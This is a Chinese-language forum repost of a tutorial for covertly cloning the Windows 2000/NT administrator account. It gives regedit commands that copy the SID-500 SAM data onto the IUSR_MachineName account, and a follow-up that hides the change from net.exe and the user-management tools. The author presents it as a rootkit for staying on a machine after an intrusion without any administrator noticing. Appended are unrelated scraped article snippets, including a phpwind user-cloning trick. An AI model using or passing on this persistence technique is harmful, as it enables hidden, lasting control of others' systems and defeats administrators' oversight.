克隆管理员帐号的方法

经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行
regedit /s adam.reg
导入该Reg文件

然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

OK,大功告成...

这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,当我们运行.net localgroup administrators 时,看看结果:
C:>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

再看看USER2SID的输出结果:
C:>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

^_^,这算不算RootKit...

附:
1、感谢叮叮付出需要reinstall OS的代价...
2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...

-----------------------------------------------------------------------------

叮叮 的补充完善

很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。
现给出解决办法。

方法同上,不过这次修改内容多一些。即
这次要导出两个key内容:
一个是adam提到的
regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4
然后另外一个是你需要修改那个账号的值
regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersE9

然后按照adam提到的修改adam.reg
“将adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改为IUSR_MachineName的SID”

现在,你还要从iusr.reg文件中复制一下内容
就是将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来
然后替换掉adam.reg中同样位置的部分

最后使用
regedit /s adam.reg
导入该Reg文件
呵呵,别忘了给这个IUSR_MachineName改密码哦。
hehe,ok,大功告成。
现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和
管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
都和修改前没有任何区别。

好了,补充结束。

 

时间: 2024-11-08 17:36:34

克隆管理员帐号的方法的相关文章

javascript数组克隆简单实现方法_javascript技巧

本文实例讲述了javascript数组克隆简单实现方法.分享给大家供大家参考,具体如下: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>新建网页 1</title> </head> <body> <script language=javascri

jQuery.extend克隆对象实现方法详解

在What is the most efficient way to clone a JavaScript object?看到jQuery作者John Resig给出的回答是这样的  代码如下 复制代码 // Shallow copy var newObject = jQuery.extend({}, oldObject);   // Deep copy var newObject = jQuery.extend(true, {}, oldObject); 今天发现 jQuery 的作者 Joh

关于phpwind克隆用户的方法_vbs

作者:lcx 来源:vbs小铺 首先将字符集中的174转一下,wscript.echo "%"&CStr(Hex(ascb(chrb(174)))),url编码的结果为%AE.当然你用别的字符集里(129-255)的也可以, 我用的是174.然后用achilles(安焦有下),修改post数据,在用户名后加上%AE提交即可.你用别的即时提交工具,好比mini browse也是可以的,这样可以防止注册码的问题.

在两机器间克隆数据库的两种方法

数据|数据库 关于克隆数据库的方法,最近一直在研究,偶尔在cnoug上闲逛,发现了两篇帖子不错,现作为以后工作中的参考: 方法一:如何使用RMAN在两机器间克隆数据库 原文摘自:www.cnoug.org 关键字:目标.目录.克隆.日志. 目标数据库和克隆数据库分别在两台机器,其环境都一样: WINDOWS 2000 SERVER SP4.IE6.1, ORACLE9205 在本文中,使用的是目标数据库上的RMAN,目录数据库在第3台机器上, 操作步骤: 1.连接目标数据库,对目标数据库做全库备

Linux中如何克隆KVM虚拟机

Linux中如何克隆KVM虚拟机 作者 digoal 日期 2016-11-11 标签 Linux , KVM , 虚拟化 , 克隆 背景 当需要批量部署虚拟机时,通常有几种做法,使用模板重新安装. 或者使用已有的虚拟机克隆. 使用模板安装可以参考kickstart脚本的编写方法. <install kvm hosts use kickstart in CentOS 6 in text mode> 本文介绍一下在已经安装好的虚拟机上,克隆虚拟机的方法. 从0开始安装一个虚拟机 在服务器安装必要

黑客攻防实战 Windows系统克隆攻击与防范第1/2页_安全设置

随着电脑技术的发展和电脑的普及,还有大大小小的"骇客"网站和越来越简单的工具,使得目前攻击变得日趋频繁,被植入木马的电脑或服务器也越来越多,与此同时系统管理员的安全意识也在不断提高,加上杀毒软件的发展,网络木马的生命周期也越来越短,所以攻击者在获取了服务器的控制权限后,一般使用克隆用户或者安装SHIFT后门达到隐藏自己的目的,下面就由我给大家介绍一些常见的克隆用户和检查是否存在克隆用户及清除的方法. 一.克隆账号的原理与危害 1.克隆账号的原理 在注册表中有两处保存了账号的SID相对标

jQuery 克隆对象的简单示例

简单例子  代码如下 复制代码 // 浅层复制(只复制顶层的非 object 元素)  var newObject = jQuery.extend({}, oldObject);    // 深层复制(一层一层往下复制直到最底层)  var newObject = jQuery.extend(true, {}, oldObject); 测试如下: var obj1 = {   'a': 's1',   'b': [1,2,3,{'a':'s2'}],   'c': {'a':'s3', 'b':

检查电脑是否被挂马的常用命令

一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出. 一.检测网络连接 如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用 Windows自带的网络命令来看看谁在连接你的计算机. 具体的命令格式是:netstat -an这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分--proto(连接方式).local address(本地连接地址).foreign address(和本地建立连

第1次亲密接触PHP5(1)

php5 文章翻译:erquanerquan注:本人现还未来得及体验PHP5,只是翻译一篇老外的文章.以下均由erquan翻译,第1次作这些的事情希望没有误导大家.有些不准的地方请谅解.大家看这样的行不行,如果行的话,偶就翻译完,不行就翻译了,免得误导了大家,也累哦....:)转贴时请注明文章来源,谢谢:) PHP5的正式版还没发布,但我们可以学习.体验下开发版给我们带来的PHP新特性.本文将集中介绍以下3大PHP5新功能:* 新对象模式* 结构化异常处理* 名称空间 在正式开始之前,请注意:*